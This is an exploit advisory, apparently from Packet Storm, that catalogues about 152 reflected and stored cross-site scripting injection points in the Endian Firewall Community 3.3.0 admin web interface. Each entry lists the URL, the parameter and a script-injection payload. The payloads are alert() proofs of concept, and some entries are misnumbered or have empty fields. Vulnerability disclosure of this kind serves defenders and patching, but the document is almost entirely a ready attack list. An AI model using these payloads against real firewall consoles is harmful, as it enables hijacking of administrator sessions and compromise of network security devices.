Endian Firewall Community release 3.3.0 Cross Site Scripting

Endian Firewall Community release version 3.3.0 suffers from multiple cross site scripting vulnerabilities.
MD5 | 2ca0bcac48d5d4b2c7a16266973f30fd
##################################################################################################################################
# Exploit Title: Endian Firewall Community release 3.3.0 | Cross-Site
Scripting
# Date: 24.01.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: https://www.endian.com
# Software Link:
https://sourceforge.net/projects/efw/files/Development/EFW-3.3.0/
# Version: 3.3.0
##################################################################################################################################

Introduction

Endian Firewall Community (EFW) is a turn-key Linux based security software
product designed for home that can transform any unused hardware appliance
into a full-featured Unified Threat Management (UTM) solution. Endian
Community is designed to make security simple and help protect home
networks by using the power of Open Source.


#################################################################################


XSS details: Reflected & Stored

#################################################################################


XSS1 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/netwizard.cgi

METHOD
Post

PARAMETER
DISPLAY_GREEN_ADDRESS

PAYLOAD
<script>alert(1)</script>

#################################################################################


XSS2 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/netwizard.cgi

METHOD
Post

PARAMETER
DISPLAY_GREEN_NETMASK

PAYLOAD
<script>alert(2)</script>

#################################################################################


XSS3 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/netwizard.cgi

METHOD
Post

PARAMETER
DISPLAY_GREEN_ADDITIONAL

PAYLOAD
<script>alert(3)</script>

#################################################################################

XSS4 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/netwizard.cgi

METHOD
Post

PARAMETER
MTU

PAYLOAD
<script>alert(4)</script>

#################################################################################

XSS5 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/netwizard.cgi

METHOD
Post

PARAMETER
MAC

PAYLOAD
<script>alert(5)</script>

#################################################################################

XSS6 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/netwizard.cgi

METHOD
Post

PARAMETER
MAIN_ADMINMAIL

PAYLOAD
<script>alert(6)</script>

#################################################################################

XSS7 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/netwizard.cgi

METHOD
Post

PARAMETER
MAIN_MAILFROM

PAYLOAD
<script>alert(7)</script>

#################################################################################

XSS8 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/netwizard.cgi

METHOD
Post

PARAMETER
MAIN_SMARTHOST

PAYLOAD
<script>alert(8)</script>

#################################################################################

XSS9 | Stored

URL
https://192.168.2.200:10443/manage/notifications/

METHOD
Post

PARAMETER
SMARTHOST_ADDRESS

PAYLOAD
"><script>alert(9)</script>

#################################################################################

XSS10 | Stored

URL
https://192.168.2.200:10443/manage/notifications/

METHOD
Post

PARAMETER
SMARTHOST_USERNAME

PAYLOAD
"><script>alert(10)</script>

#################################################################################

XSS11 | Stored

URL
https://192.168.2.200:10443/manage/password/web/?ACTION=edit&CONTROLLERNAME=&ID=2

METHOD
Post

PARAMETER
remark

PAYLOAD
"><script>alert(11)</script>

#################################################################################

XSS12 | Reflected

URL
https://192.168.2.200:10443/manage/gui/

METHOD
Post

PARAMETER
new_cert_name

PAYLOAD
"><script>alert(12)</script>

#################################################################################

XSS13 | Reflected

URL
https://192.168.2.200:10443/manage/gui/

METHOD
Post

PARAMETER
new_cert_email

PAYLOAD
"><script>alert(13)</script>

#################################################################################

XSS14 | Reflected

URL
https://192.168.2.200:10443/manage/gui/

METHOD
Post

PARAMETER
new_cert_ou

PAYLOAD
"><script>alert(14)</script>

#################################################################################

XSS15 | Reflected

URL
https://192.168.2.200:10443/manage/gui/

METHOD
Post

PARAMETER
new_cert_city

PAYLOAD
"><script>alert(15)</script>

#################################################################################

XSS16 | Reflected

URL
https://192.168.2.200:10443/manage/gui/

METHOD
Post

PARAMETER
new_cert_state

PAYLOAD
"><script>alert(16)</script>

#################################################################################

XSS17 | Reflected

URL
https://192.168.2.200:10443/manage/gui/

METHOD
Post

PARAMETER
new_cert_days

PAYLOAD
"><script>alert(17)</script>

#################################################################################

XSS18 | Reflected

URL
https://192.168.2.200:10443/manage/gui/

METHOD
Post

PARAMETER
upload_cert_req_days

PAYLOAD
"><script>alert(18)</script>

#################################################################################
XSS19 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/backupschedule.cgi

METHOD
Post

PARAMETER
BACKUP_RCPTTO

PAYLOAD
"><script>alert(19)</script>

#################################################################################

XSS20 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/backupschedule.cgi

METHOD
Post

PARAMETER
BACKUP_MAILFROM

PAYLOAD
"><script>alert(20)</script>

#################################################################################

XSS21 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/backupschedule.cgi

METHOD
Post

PARAMETER
BACKUP_SMARTHOST

PAYLOAD
"><script>alert(21)</script>

#################################################################################

XSS22 | Stored

URL
https://192.168.2.200:10443/manage/dnsmasq/hosts/?ACTION=edit&CONTROLLERNAME=hosts&ID=1

METHOD
Post

PARAMETER
remark

PAYLOAD
"><script>alert(22)</script>

#################################################################################

XSS23 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/routing.cgi

METHOD
Post

PARAMETER
source

PAYLOAD
"><script>alert(23)</script>

#################################################################################

XSS24 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/routing.cgi

METHOD
Post

PARAMETER
destination

PAYLOAD
"><script>alert(24)</script>

#################################################################################

XSS25 | Reflected

URL


METHOD


PARAMETER


PAYLOAD
"><script>alert(25)</script>

#################################################################################

XSS26 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/policy_routing.cgi

METHOD
Post

PARAMETER
source

PAYLOAD
"><script>alert(26)</script>

#################################################################################

XSS27 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/policy_routing.cgi

METHOD
Post

PARAMETER
destination

PAYLOAD
"><script>alert(27)</script>

#################################################################################

XSS28 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/policy_routing.cgi

METHOD
Post

PARAMETER
port

PAYLOAD
"><script>alert(28)</script>

#################################################################################

XSS29 | Stored

URL
https://192.168.2.200:10443/cgi-bin/uplinkeditor.cgi

METHOD
Post

PARAMETER
NAME

PAYLOAD
"><script>alert(29)</script>

#################################################################################

XSS30 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/vlanconfig.cgi

METHOD
Post

PARAMETER
DEVICE

PAYLOAD
"><script>alert(30)</script>

#################################################################################

XSS31 | Stored

URL
https://192.168.2.200:10443/manage/dhcp/settings/

METHOD
Post

PARAMETER
DEFAULT_LEASE_TIME_GREEN

PAYLOAD
"><script>alert(31)</script>

#################################################################################

XSS32 | Stored

URL
https://192.168.2.200:10443/manage/dhcp/settings/

METHOD
Post

PARAMETER
MAX_LEASE_TIME_GREEN

PAYLOAD
"><script>alert(32)</script>

#################################################################################

XSS33 | Stored

URL
https://192.168.2.200:10443/manage/dhcp/settings/

METHOD
Post

PARAMETER
DOMAIN_NAME_GREEN

PAYLOAD
"><script>alert(33)</script>

#################################################################################

XSS34 | Stored

URL
https://192.168.2.200:10443/manage/dhcp/settings/

METHOD
Post

PARAMETER
DEFAULT_LEASE_TIME_ORANGE

PAYLOAD
"><script>alert(34)</script>

#################################################################################

XSS35 | Stored

URL
https://192.168.2.200:10443/manage/dhcp/settings/

METHOD
Post

PARAMETER
MAX_LEASE_TIME_ORANGE

PAYLOAD
"><script>alert(35)</script>

#################################################################################

XSS36 | Stored

URL
https://192.168.2.200:10443/manage/dhcp/settings/

METHOD
Post

PARAMETER
DOMAIN_NAME_ORANGE

PAYLOAD
"><script>alert(36)</script>

#################################################################################

XSS37 | Stored

URL
https://192.168.2.200:10443/manage/dhcp/settings/

METHOD
Post

PARAMETER
DEFAULT_LEASE_TIME_BLUE

PAYLOAD
"><script>alert(37)</script>

#################################################################################

XSS38 | Stored

URL
https://192.168.2.200:10443/manage/dhcp/settings/

METHOD
Post

PARAMETER
MAX_LEASE_TIME_BLUE

PAYLOAD
"><script>alert(38)</script>

#################################################################################

XSS39 | Stored

URL
https://192.168.2.200:10443/manage/dhcp/settings/

METHOD
Post

PARAMETER
DOMAIN_NAME_BLUE

PAYLOAD
"><script>alert(39)</script>

#################################################################################

XSS40 | Reflected

URL
https://192.168.2.200:10443/manage/dhcp/fixed_leases/

METHOD
Post

PARAMETER
remark

PAYLOAD
"><script>alert(40)</script>

#################################################################################

XSS41 | Reflected

URL
https://192.168.2.200:10443/manage/dhcp/fixed_leases/

METHOD
Post

PARAMETER
filename

PAYLOAD
"><script>alert(41)</script>

#################################################################################

XSS42 | Reflected

URL
https://192.168.2.200:10443/manage/dhcp/fixed_leases/

METHOD
Post

PARAMETER
root_path

PAYLOAD
"><script>alert(42)</script>

#################################################################################

XSS43 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/time.cgi

METHOD
Post

PARAMETER
NTP_SERVER_LIST

PAYLOAD
"><script>alert(43)</script>

#################################################################################

XSS44 | Stored

URL
https://192.168.2.200:10443/cgi-bin/salearn.cgi

METHOD
Post

PARAMETER
remark

PAYLOAD
"><script>alert(44)</script>

#################################################################################

XSS45 | Stored

URL
https://192.168.2.200:10443/cgi-bin/salearn.cgi

METHOD
Post

PARAMETER
host

PAYLOAD
"><script>alert(45)</script>

#################################################################################

XSS46 | Stored

URL
https://192.168.2.200:10443/cgi-bin/salearn.cgi

METHOD
Post

PARAMETER
user

PAYLOAD
"><script>alert(46)</script>

#################################################################################

XSS3 | Stored

URL
https://192.168.2.200:10443/cgi-bin/salearn.cgi

METHOD
Post

PARAMETER
ham

PAYLOAD
"><script>alert(47)</script>

#################################################################################

XSS48 | Stored

URL
https://192.168.2.200:10443/cgi-bin/salearn.cgi

METHOD
Post

PARAMETER
spam

PAYLOAD
"><script>alert(48)</script>

#################################################################################

XSS49 | Reflected

URL
https://192.168.2.200:10443/manage/qos/devices/

METHOD
Post

PARAMETER
device

PAYLOAD
"><script>alert(49)</script>

#################################################################################

XSS50 | Reflected

URL
https://192.168.2.200:10443/manage/qos/classes/

METHOD
Post

PARAMETER
name

PAYLOAD
"><script>alert(50)</script>

#################################################################################

XSS51 | Reflected

URL
https://192.168.2.200:10443/manage/qos/rules/

METHOD
Post

PARAMETER
protocol

PAYLOAD
"><script>alert(51)</script>

#################################################################################

XSS52 | Reflected

URL
https://192.168.2.200:10443/manage/qos/rules/

METHOD
Post

PARAMETER
dscp

PAYLOAD
"><script>alert(52)</script>

#################################################################################

XSS53 | Reflected

URL
https://192.168.2.200:10443/manage/qos/rules/

METHOD
Post

PARAMETER
comment

PAYLOAD
"><script>alert(53)</script>

#################################################################################

XSS54 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/dnat.cgi

METHOD
Post

PARAMETER
target_ip_ip

PAYLOAD
"><script>alert(54)</script>

#################################################################################

XSS55 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/snat.cgi

METHOD
Post

PARAMETER
source

PAYLOAD
"><script>alert(55)</script>

#################################################################################

XSS56 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/snat.cgi

METHOD
Post

PARAMETER
snat_to_ip

PAYLOAD
"><script>alert(56)</script>

#################################################################################

XSS57 | Stored

URL
https://192.168.2.200:10443/cgi-bin/incoming.cgi

METHOD
Post

PARAMETER
destination

PAYLOAD
"><script>alert(57)</script>

#################################################################################

XSS58 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/incoming.cgi

METHOD
Post

PARAMETER
target

PAYLOAD
"><script>alert(58)</script>

#################################################################################

XSS59 | Stored

URL
https://192.168.2.200:10443/cgi-bin/incoming.cgi

METHOD
Post

PARAMETER
remark

PAYLOAD
"><script>alert(59)</script>

#################################################################################

XSS60 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/outgoingfw.cgi

METHOD
Post

PARAMETER
target

PAYLOAD
"><script>alert(60)</script>

#################################################################################

XSS61 | Stored

URL
https://192.168.2.200:10443/cgi-bin/outgoingfw.cgi

METHOD
Post

PARAMETER
remark

PAYLOAD
"><script>alert(61)</script>

#################################################################################

XSS62 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/zonefw.cgi

METHOD
Post

PARAMETER
target

PAYLOAD
"><script>alert(62)</script>

#################################################################################

XSS63 | Stored

URL
https://192.168.2.200:10443/cgi-bin/zonefw.cgi

METHOD
Post

PARAMETER
remark

PAYLOAD
"><script>alert(63)</script>

#################################################################################

XSS64 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/vpnfw.cgi

METHOD
Post

PARAMETER
source

PAYLOAD
"><script>alert(64)</script>

#################################################################################

XSS65 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/vpnfw.cgi

METHOD
Post

PARAMETER
target

PAYLOAD
"><script>alert(65)</script>

#################################################################################

XSS66 | Stored

URL
https://192.168.2.200:10443/cgi-bin/vpnfw.cgi

METHOD
Post

PARAMETER
remark

PAYLOAD
"><script>alert(66)</script>

#################################################################################

XSS67 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/xtaccess.cgi

METHOD
Post

PARAMETER
target

PAYLOAD
"><script>alert(67)</script>

#################################################################################

XSS68 | Stored

URL
https://192.168.2.200:10443/cgi-bin/xtaccess.cgi

METHOD
Post

PARAMETER
remark

PAYLOAD
"><script>alert(68)</script>

#################################################################################

XSS69 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi

METHOD
Post

PARAMETER
PROXY_PORT

PAYLOAD
"><script>alert(69)</script>

#################################################################################

XSS70 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi

METHOD
Post

PARAMETER
VISIBLE_HOSTNAME

PAYLOAD
"><script>alert(70)</script>

#################################################################################

XSS71 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi

METHOD
Post

PARAMETER
ADMIN_MAIL_ADDRESS

PAYLOAD
"><script>alert(71)</script>

#################################################################################

XSS72 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi

METHOD
Post

PARAMETER
BYPASS_SOURCE

PAYLOAD
"><script>alert(72)</script>

#################################################################################

XSS73 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi

METHOD
Post

PARAMETER
BYPASS_DESTINATION

PAYLOAD
"><script>alert(73)</script>

#################################################################################

XSS74 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi

METHOD
Post

PARAMETER
CACHE_SIZE

PAYLOAD
"><script>alert(74)</script>

#################################################################################

XSS75 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi

METHOD
Post

PARAMETER
CACHE_MEM

PAYLOAD
"><script>alert(75)</script>

#################################################################################

XSS76 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi

METHOD
Post

PARAMETER
MAX_SIZE

PAYLOAD
"><script>alert(76)</script>

#################################################################################

XSS77 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi

METHOD
Post

PARAMETER
DST_NOCACHE

PAYLOAD
"><script>alert(77)</script>

#################################################################################

XSS78 | Stored

URL
https://192.168.2.200:10443/cgi-bin/proxypolicy.cgi

METHOD
Post

PARAMETER
filtertype

PAYLOAD
"><script>alert(78)</script>

#################################################################################

XSS79 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/proxyauth.cgi

METHOD
Post

PARAMETER
AUTH_CHILDREN

PAYLOAD
"><script>alert(79)</script>

#################################################################################

XSS80 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/proxyauth.cgi

METHOD
Post

PARAMETER
AUTH_MAX_USERIP

PAYLOAD
"><script>alert(80)</script>

#################################################################################

XSS81 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/proxyauth.cgi

METHOD
Post

PARAMETER
AUTH_CACHE_TTL

PAYLOAD
"><script>alert(81)</script>

#################################################################################

XSS82 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/proxyauth.cgi

METHOD
Post

PARAMETER
AUTH_IPCACHE_TTL

PAYLOAD
"><script>alert(82)</script>

#################################################################################

XSS83 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/proxyauth.cgi

METHOD
Post

PARAMETER
NCSA_MIN_PASS_LEN

PAYLOAD
"><script>alert(83)</script>

#################################################################################

XSS84 | Reflected

URL
https://192.168.2.200:10443/manage/proxy/adjoin/

METHOD
Post

PARAMETER
ADMIN_USER

PAYLOAD
"><script>alert(84)</script>

#################################################################################

XSS85 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/frox.cgi

METHOD
Post

PARAMETER
TRANSPARENT_SOURCE_BYPASS

PAYLOAD
"><script>alert(85)</script>

#################################################################################

XSS86 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/frox.cgi

METHOD
Post

PARAMETER
TRANSPARENT_DESTINATION_BYPASS

PAYLOAD
"><script>alert(86)</script>

#################################################################################

XSS87 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/smtpconfig.cgi

METHOD
Post

PARAMETER
VIRUS_ADMIN

PAYLOAD
"><script>alert(87)</script>

#################################################################################

XSS88 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/smtpconfig.cgi

METHOD
Post

PARAMETER
NOTIFICATION_SENDER

PAYLOAD
"><script>alert(88)</script>

#################################################################################

XSS89 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/smtpconfig.cgi

METHOD
Post

PARAMETER
BYPASS_SOURCE

PAYLOAD
"><script>alert(89)</script>

#################################################################################

XSS90 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/smtpconfig.cgi

METHOD
Post

PARAMETER
BYPASS_DESTINATION

PAYLOAD
"><script>alert(90)</script>

#################################################################################

XSS91 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi

METHOD
Post

PARAMETER
SENDER_WHITELIST

PAYLOAD
"><script>alert(91)</script>

#################################################################################

XSS92 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi

METHOD
Post

PARAMETER
RECIPIENT_WHITELIST

PAYLOAD
"><script>alert(92)</script>

#################################################################################

XSS93 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi

METHOD
Post

PARAMETER
CLIENT_WHITELIST

PAYLOAD
"><script>alert(93)</script>

#################################################################################

XSS94 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi

METHOD
Post

PARAMETER
SENDER_BLACKLIST

PAYLOAD
"><script>alert(94)</script>

#################################################################################

XSS95 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi

METHOD
Post

PARAMETER
RECIPIENT_BLACKLIST

PAYLOAD
"><script>alert(95)</script>

#################################################################################

XSS96 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi

METHOD
Post

PARAMETER
CLIENT_BLACKLIST

PAYLOAD
"><script>alert(96)</script>

#################################################################################

XSS97 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi

METHOD
Post

PARAMETER
WHITELIST_RECIPIENT

PAYLOAD
"><script>alert(97)</script>

#################################################################################

XSS98 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi

METHOD
Post

PARAMETER
WHITELIST_CLIENT

PAYLOAD
"><script>alert(98)</script>

#################################################################################

XSS99 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi

METHOD
Post

PARAMETER
SPAM_WHITELIST

PAYLOAD
"><script>alert(99)</script>

#################################################################################

XSS100 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi

METHOD
Post

PARAMETER
SPAM_BLACKLIST

PAYLOAD
"><script>alert(100)</script>

#################################################################################

XSS101 | Stored

URL
https://192.168.2.200:10443/cgi-bin/smtpdomains.cgi

METHOD
Post

PARAMETER
DOMAIN

PAYLOAD
"><script>alert(101)</script>

#################################################################################

XSS102 | Stored

URL
https://192.168.2.200:10443/cgi-bin/smtpdomains.cgi

METHOD
Post

PARAMETER
SERVER

PAYLOAD
"><script>alert(102)</script>

#################################################################################

XSS103 | Reflected

URL
https://192.168.2.200:10443/manage/smtpscan/domainrouting/

METHOD
Post

PARAMETER
domain

PAYLOAD
"><script>alert(103)</script>

#################################################################################

XSS104 | Reflected

URL
https://192.168.2.200:10443/manage/smtpscan/domainrouting/

METHOD
Post

PARAMETER
smarthost_address

PAYLOAD
"><script>alert(104)</script>

#################################################################################

XSS105 | Reflected

URL
https://192.168.2.200:10443/manage/smtpscan/domainrouting/

METHOD
Post

PARAMETER
smarthost_username

PAYLOAD
"><script>alert(105)</script>

#################################################################################

XSS106 | Stored

URL
https://192.168.2.200:10443/cgi-bin/smtprouting.cgi

METHOD
Post

PARAMETER
ADDRESS

PAYLOAD
"><script>alert(106)</script>

#################################################################################

XSS107 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/smtprouting.cgi

METHOD
Post

PARAMETER
BCC

PAYLOAD
"><script>alert(107)</script>

#################################################################################

XSS108 | Reflected

URL
https://192.168.2.200:10443/manage/smtpscan/advanced/

METHOD
Post

PARAMETER
SMARTHOST_USERNAME

PAYLOAD
"><script>alert(108)</script>

#################################################################################

XSS109 | Reflected

URL
https://192.168.2.200:10443/manage/smtpscan/advanced/

METHOD
Post

PARAMETER
AUTH_DAEMONS

PAYLOAD
"><script>alert(109)</script>

#################################################################################

XSS110 | Stored

URL
https://192.168.2.200:10443/manage/smtpscan/advanced/

METHOD
Post

PARAMETER
IMAP_AUTH_SERVER

PAYLOAD


#################################################################################

XSS111 | Reflected

URL
https://192.168.2.200:10443/manage/smtpscan/advanced/

METHOD
Post

PARAMETER
SMTP_HELO_NAME

PAYLOAD
"><script>alert(111)</script>

#################################################################################

XSS112 | Stored

URL
https://192.168.2.200:10443/manage/smtpscan/advanced/

METHOD
Post

PARAMETER
ALWAYS_BCC_ADDRESS

PAYLOAD
"><script>alert(112)</script>

#################################################################################

XSS113 | Reflected

URL
https://192.168.2.200:10443/manage/smtpscan/advanced/

METHOD
Post

PARAMETER
MAILTEMPLATE_LANGUAGE

PAYLOAD
"><script>alert(113)</script>

#################################################################################

XSS114 | Reflected

URL
https://192.168.2.200:10443/manage/smtpscan/advanced/

METHOD
Post

PARAMETER
SMTPD_HARD_ERROR_LIMIT

PAYLOAD
"><script>alert(114)</script>

#################################################################################

XSS115 | Reflected

URL
https://192.168.2.200:10443/manage/dnsmasq/localdomains/

METHOD
Post

PARAMETER
remark

PAYLOAD
"><script>alert(115)</script>

#################################################################################

XSS116 | Reflected

URL
https://192.168.2.200:10443/manage/openvpn/

METHOD
Post

PARAMETER
reneg_sec

PAYLOAD
"><script>alert(116)</script>

#################################################################################

XSS55 | Reflected

URL
https://192.168.2.200:10443/manage/ipsec/

METHOD
Post

PARAMETER
remark

PAYLOAD
"><script>alert(117)</script>

#################################################################################

XSS118 | Reflected

URL
https://192.168.2.200:10443/manage/ipsec/

METHOD
Post

PARAMETER
secret

PAYLOAD
"><script>alert(118)</script>

#################################################################################

XSS119 | Reflected

URL
https://192.168.2.200:10443/manage/ipsec/

METHOD
Post

PARAMETER
new_cert_name

PAYLOAD
"><script>alert(119)</script>

#################################################################################

XSS120 | Reflected

URL
https://192.168.2.200:10443/manage/ipsec/

METHOD
Post

PARAMETER
new_cert_email

PAYLOAD
"><script>alert(120)</script>

#################################################################################

XSS121 | Reflected

URL
https://192.168.2.200:10443/manage/ipsec/

METHOD
Post

PARAMETER
new_cert_ou

PAYLOAD
"><script>alert(121)</script>

#################################################################################

XSS122 | Reflected

URL
https://192.168.2.200:10443/manage/ipsec/

METHOD
Post

PARAMETER
new_cert_organization

PAYLOAD
"><script>alert(122)</script>

#################################################################################

XSS123 | Reflected

URL
https://192.168.2.200:10443/manage/ipsec/

METHOD
Post

PARAMETER
new_cert_city

PAYLOAD
"><script>alert(123)</script>

#################################################################################

XSS124 | Reflected

URL
https://192.168.2.200:10443/manage/ipsec/

METHOD
Post

PARAMETER
new_cert_state

PAYLOAD
"><script>alert(124)</script>

#################################################################################

XSS125 | Reflected

URL
https://192.168.2.200:10443/manage/ipsec/

METHOD
Post

PARAMETER
new_cert_days

PAYLOAD
"><script>alert(125)</script>

#################################################################################

XSS126 | Reflected

URL
https://192.168.2.200:10443/manage/ipsec/

METHOD
Post

PARAMETER
upload_cert_req_days

PAYLOAD
"><script>alert(126)</script>

#################################################################################

XSS127 | Reflected

URL
https://192.168.2.200:10443/manage/ipsec/

METHOD
Post

PARAMETER
local_peerid

PAYLOAD
"><script>alert(127)</script>

#################################################################################

XSS128 | Reflected

URL
https://192.168.2.200:10443/manage/ipsec/

METHOD
Post

PARAMETER
remote_peerid

PAYLOAD
"><script>alert(128)</script>

#################################################################################

XSS129 | Reflected

URL
https://192.168.2.200:10443/manage/vpnauthentication/user/

METHOD
Post

PARAMETER
name

PAYLOAD
"><script>alert(129)</script>

#################################################################################

XSS130 | Reflected

URL
https://192.168.2.200:10443/manage/vpnauthentication/user/

METHOD
Post

PARAMETER
remark

PAYLOAD
"><script>alert(130)</script>

#################################################################################

XSS131 | Reflected

URL
https://192.168.2.200:10443/manage/vpnauthentication/user/

METHOD
Post

PARAMETER
new_cert_days

PAYLOAD
"><script>alert(131)</script>

#################################################################################

XSS132 | Reflected

URL
https://192.168.2.200:10443/manage/vpnauthentication/user/

METHOD
Post

PARAMETER
upload_cert_req_days

PAYLOAD
"><script>alert(132)</script>

#################################################################################

XSS133 | Reflected

URL
https://192.168.2.200:10443/manage/vpnauthentication/user/

METHOD
Post

PARAMETER
user_department

PAYLOAD
"><script>alert(133)</script>

#################################################################################

XSS134 | Reflected

URL
https://192.168.2.200:10443/manage/vpnauthentication/user/

METHOD
Post

PARAMETER
user_organization

PAYLOAD
"><script>alert(134)</script>

#################################################################################

XSS135 | Reflected

URL
https://192.168.2.200:10443/manage/vpnauthentication/user/

METHOD
Post

PARAMETER
user_city

PAYLOAD
"><script>alert(135)</script>

#################################################################################

XSS136 | Reflected

URL
https://192.168.2.200:10443/manage/vpnauthentication/user/

METHOD
Post

PARAMETER
user_state

PAYLOAD
"><script>alert(136)</script>

#################################################################################

XSS137 | Reflected

URL
https://192.168.2.200:10443/manage/ca/certificate/

METHOD
Post

PARAMETER
new_cert_name

PAYLOAD
"><script>alert(137)</script>

#################################################################################

XSS138 | Reflected

URL
https://192.168.2.200:10443/manage/ca/certificate/

METHOD
Post

PARAMETER
new_cert_ou

PAYLOAD
"><script>alert(138)</script>

#################################################################################

XSS139 | Reflected

URL
https://192.168.2.200:10443/manage/ca/certificate/

METHOD
Post

PARAMETER
new_cert_organization

PAYLOAD
"><script>alert(139)</script>

#################################################################################

XSS140 | Reflected

URL
https://192.168.2.200:10443/manage/ca/certificate/

METHOD
Post

PARAMETER
new_cert_city

PAYLOAD
"><script>alert(140)</script>

#################################################################################

XSS141 | Reflected

URL
https://192.168.2.200:10443/manage/ca/certificate/

METHOD
Post

PARAMETER
new_cert_state

PAYLOAD
"><script>alert(141)</script>

#################################################################################

XSS142 | Reflected

URL
https://192.168.2.200:10443/manage/ca/certificate/

METHOD
Post

PARAMETER
upload_cert_req_days

PAYLOAD
"><script>alert(142)</script>

#################################################################################

XSS143 | Stored

URL
https://192.168.2.200:10443/cgi-bin/logs_log.cgi

METHOD
Post

PARAMETER
DATE

PAYLOAD
"><script>alert(143)</script>

#################################################################################

XSS144 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/logs_log.cgi

METHOD
Post

PARAMETER
OFFSET

PAYLOAD
"><script>alert(144)</script>

#################################################################################

XSS145 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/logs_ids.cgi

METHOD
Post

PARAMETER
DATE

PAYLOAD
"><script>alert(145)</script>

#################################################################################

XSS146 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/logs_openvpn.cgi

METHOD
Post

PARAMETER
DATE

PAYLOAD
"><script>alert(146)</script>

#################################################################################

XSS147 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/logs_clamav.cgi

METHOD
Post

PARAMETER
DATE

PAYLOAD
"><script>alert(147)</script>

#################################################################################

XSS148 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/logs_firewall.cgi

METHOD
Post

PARAMETER
DATE

PAYLOAD
"><script>alert(148)</script>

#################################################################################

XSS149 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/logs_firewall.cgi

METHOD
Post

PARAMETER
OFFSET

PAYLOAD
"><script>alert(148)</script>

#################################################################################

XSS149 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/logs_proxy.cgi

METHOD
Post

PARAMETER
DATE

PAYLOAD
"><script>alert(149)</script>

#################################################################################

XSS150 | Reflected

URL
https://192.168.2.200:10443/cgi-bin/logs_smtp.cgi

METHOD
Post

PARAMETER
DATE

PAYLOAD
"><script>alert(150)</script>

#################################################################################

XSS151 | Stored

URL
https://192.168.2.200:10443/manage/opentsa/

METHOD
Post

PARAMETER
HTTP_USERNAME

PAYLOAD
"><script>alert(151)</script>

#################################################################################

XSS152 | Stored

URL
https://192.168.2.200:10443/manage/opentsa/

METHOD
Post

PARAMETER
HTTP_PASSWORD

PAYLOAD
"><script>alert(152)</script>

#################################################################################
Source: packetstormsecurity.com
Exploit Collector

Search Exploit

Endian Firewall Community release 3.3.0 Cross Site Scripting
